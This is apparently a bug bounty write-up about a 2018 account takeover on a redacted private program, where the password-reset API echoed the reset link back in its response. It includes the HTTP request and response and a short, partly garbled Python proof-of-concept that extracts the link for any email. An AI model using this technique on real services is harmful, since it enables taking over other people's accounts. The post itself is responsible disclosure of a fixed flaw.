Account Take over via reset password


The old story was deleted as per team request , it was containing a reference that discloses the program , if this also may cause any type of impact , please reach me to edit or delete .

Recently i have been asked many times by Hackerone hackers about my last finding which appeared on hacktivity page disclosing the bounty , Ok i’m discussing it here.

It’s was 17 June , and Egypt has been defeated 0:1 by Uruguay :(.
All Egyptians are sad and complaining , the same as i, i have to find something that may make my day and forget what Gimenez scored .

Five days before , I got invited by Xprogram which is private on hackerone , sorry for redacting and not disclosing it.

Let’s take a look , After some reconnaissance , i managed to test the login function which is my favorite .

I tried to reset my password , navigated to

I filled my email and submitted the request , To be honest i sent the request to burp repeater/intruder to find if i can inject random host header or see if it’s vulnerable to brute force so we may report a missing rate limit or try token generation guessing attack by reverse-engineering tokens .
The main application was sitting on and all requests were being sent cross-domain to their API at
So if you managed to reset or login you have to navigate to

And a cross domain request will be issued to depending on what action you want to proceed

This is not necessary to speak about , but i’m giving an excuse for the developer who made the mistake and printed all parameters back .
The vulnerability we are talking about is returning all parameters back in HTTP response.

Anyway, the final request when you press send me link to reset my password

POST /access/forgotPassword HTTP/1.1 
User-Agent: Mozilla
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/json;charset=utf-8
Content-Length: 52
Cookie: redacted=yes;
Connection: close

The shock
The response was :

HTTP/1.1 200 OK
{“name”:”send-email”,”resetPasswordLink”:”" , “many-other-parameters”:”many values”}

Really , yes the reset-password link was returned in response.
The report was too short ,
guys the reset-password link is returned in response , any one can hack anyone

I said it’s not enough , i wrote a python script to help the team to easily replicate the exploit.

import sys, requests
print ‘ — — — — — — — — — — — — — — — — — — \n\n’
burp0_url = “"
burp0_cookies = {“cookie_not_useful”:”vallxxx”}
burp0_headers = { “User-Agent”: “Mozilla”, “Accept”: “application/json, text/plain, */*”, “Accept-Language”: “en-US,en;q=0.5”, “Content-Type”: “application/json;charset=utf-8”, “Referer”: “", “origin”: “", “Connection”: “close”}
burp0_json={“email”: em, “language”: “en”}, headers=burp0_headers, cookies=burp0_cookies, json=burp0_json)
print r.text.encode(‘utf-8’).split(‘resetPasswordLink”:”’)[1].split(‘“‘)[0]

print error

When running the script with email as argument

As said before , the response will contain the link to reset any password .
Yeah , these 17 lines are able to hack any account on the platform.

The script was unnecessary but it helped them , and i got a nice feedback for it.

I had a very nice experience , i accidentally violated the terms , however the team was tolerant and respectful and did not cancel my invitation.

Tip:Always review responses carefully .
Happy hacking ,

June 17, 2018 12:18:58 Reported
June 18, 2018 02:12:15 Triaged
June 18, 2018 14:45:26 Fixed
June 18, 2018 14:46:05 Bounty awarded 1500$